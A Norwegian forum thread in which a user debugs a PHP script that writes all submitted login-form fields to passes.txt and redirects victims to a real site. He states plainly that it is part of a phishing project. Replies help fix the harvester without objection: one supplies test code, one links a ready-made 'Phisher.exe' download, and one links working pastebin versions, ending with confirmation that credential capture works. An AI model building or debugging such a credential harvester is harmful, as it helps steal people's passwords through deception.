Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  8 1007
Hei. Hva er feil i koden her?

Kode

<?php
header ('Location: http://xxx.com ');
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Hvorfor kommer ikke det jeg skriver inn på xxx.php inn på passes.txt? Eneste jeg får på passes.txt er "core=Arrayrnval=Arrayrnrn"

På forhånd takk.
King of Spooning
Acidous's Avatar
Hva skjer om du prøver print_r $value ?
Sitat av Magnisx Vis innlegg
Hei. Hva er feil i koden her?

Kode

<?php
header ('Location: http://xxx.com ');
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Hvorfor kommer ikke det jeg skriver inn på xxx.php inn på passes.txt? Eneste jeg får på passes.txt er "core=Arrayrnval=Arrayrnrn"

På forhånd takk.
Vis hele sitatet...
Det er ikke noe feil i koden her, men det du gjør er jo å loope igjennom postdata.

Jeg lagde en simpel html fil som ser slik ut (post.html) :

Kode

<html>
<body>
	<form method="POST" action="test.php">
		<input type="text" name="field1" />
		<input type="text" name="field2" />
		<input type="password" name="pass1" />
		<input type="submit" name="sendData" />
	</form>
</body>
</html>
test.php er den eksakte koden du har skrevet.

Resultatet jeg da fikk i passes.txt er følgende:
field1=test1
field2=test2
pass1=test3
sendData=Send

Og dette stemmer jo 100%, det der er jo all postdata som ble sendt fra html filen (post.html) altså den html koden jeg skrev over.

Forstår ikke helt problemet ditt her, og jeg må eventuelt se filen du sender postdataen fra for å kunne hjelpe deg mer her.
I si i, i.
Magnisx's Avatar
Trådstarter
Altså, jeg driver med ett lite phishing prosjekt. Jeg har siden index.php der du kan logge inn

Kode

<form method="post" action="login.php"
Videre blir den informasjonen sendt til sendt til login.php
Login.php videresender de til en "ekte" side og informasjonen de skrev inn i index.php skal (det jeg prøver) sendes til login.php og videre fra der til passes.txt

Altså, problemet ligger i login.php koden. Jeg får ikke informasjonen jeg trenger til å havne i passes.txt
Sitat av Magnisx Vis innlegg
Altså, jeg driver med ett lite phishing prosjekt. Jeg har siden index.php der du kan logge inn

Kode

<form method="post" action="login.php"
Videre blir den informasjonen sendt til sendt til login.php
Login.php videresender de til en "ekte" side og informasjonen de skrev inn i index.php skal (det jeg prøver) sendes til login.php og videre fra der til passes.txt

Altså, problemet ligger i login.php koden. Jeg får ikke informasjonen jeg trenger til å havne i passes.txt
Vis hele sitatet...
Hvis det er enkel phishing det er snakk om kan du benytte deg av denne filen. Veldig enkel å bruke, jeg har ikke merket noe til virus med diverse virussjekker.
https://www.dropbox.com/s/32rfjnm6au...%20Phisher.exe
Sitat av Magnisx Vis innlegg
Altså, jeg driver med ett lite phishing prosjekt. Jeg har siden index.php der du kan logge inn

Kode

<form method="post" action="login.php"
Videre blir den informasjonen sendt til sendt til login.php
Login.php videresender de til en "ekte" side og informasjonen de skrev inn i index.php skal (det jeg prøver) sendes til login.php og videre fra der til passes.txt

Altså, problemet ligger i login.php koden. Jeg får ikke informasjonen jeg trenger til å havne i passes.txt
Vis hele sitatet...
Jeg går ut i fra at dette kun er for "educational purposes only". Vet ikke hvordan retningslinjene til freak.no er rundt dette.

Om man går ut i fra at den koden du skrev øverst i tråden er login.php så skal det fungere helt fint. Jeg brukte som sagt samme kode som du skrev, og satte opp en egen html fil. Den hentet ut all post-data jeg skrev.

Så da må evt. feilen ligge i siden du prøver å poste i fra eller så inneholder login.php noe annet enn det som står øverst i tråden.

Om du ønsker så kan du sende meg en pm om du ikke ønsker å skrive den nødvendige informasjonen jeg trenger for å se nærmere på problemet her.
Sist endret av andrew92; 24. oktober 2013 kl. 22:35.
I si i, i.
Magnisx's Avatar
Trådstarter
Sitat av andrew92 Vis innlegg
Jeg går ut i fra at dette kun er for "educational purposes only". Vet ikke hvordan retningslinjene til freak.no er rundt dette.

Om man går ut i fra at den koden du skrev øverst i tråden er login.php så skal det fungere helt fint. Jeg brukte som sagt samme kode som du skrev, og satte opp en egen html fil. Den hentet ut all post-data jeg skrev.

Så da må evt. feilen ligge i siden du prøver å poste i fra eller så inneholder login.php noe annet enn det som står øverst i tråden.

Om du ønsker så kan du sende meg en pm om du ikke ønsker å skrive den nødvendige informasjonen jeg trenger for å se nærmere på problemet her.
Vis hele sitatet...
Ja. Er bare for; som du sa educational purposes only . Driver å tester/lærer litt. Ja, skal sende deg en pm om jeg ikke får det til.

Men jeg får bare ut : core=Arrayrnval=Arrayrnrn og ikke det jeg skrev inn i index.php!
Sitat av Magnisx Vis innlegg
Ja. Er bare for; som du sa educational purposes only . Driver å tester/lærer litt. Ja, skal sende deg en pm om jeg ikke får det til.

Men jeg får bare ut : core=Arrayrnval=Arrayrnrn og ikke det jeg skrev inn i index.php!
Vis hele sitatet...
Du får teste ut litt, jeg har laget et lite eksempel som demonsterer hvordan det fungerer.

Jeg har 2 filer:
  • index.html (her er den grafiske biten)
  • sendLogin.php (her logges den post-dataen som blir mottatt)

Pastebin
index.html - http://pastebin.com/yDr6r6QC
sendLogin.php - http://pastebin.com/thJ7r8bV

Kodene over fungerer ypperlig, jeg forsøkte å "logge inn" to ganger på index siden, og her ser du hva resultatet ble i tekstfilen som ble lagret.

http://gyazo.com/dc0ddce97703044a438e82f02ee2713c.png
I si i, i.
Magnisx's Avatar
Trådstarter
Yes, det funker! ) Tusen hjertlig takk. Var en dum feil i kildekoden som ødela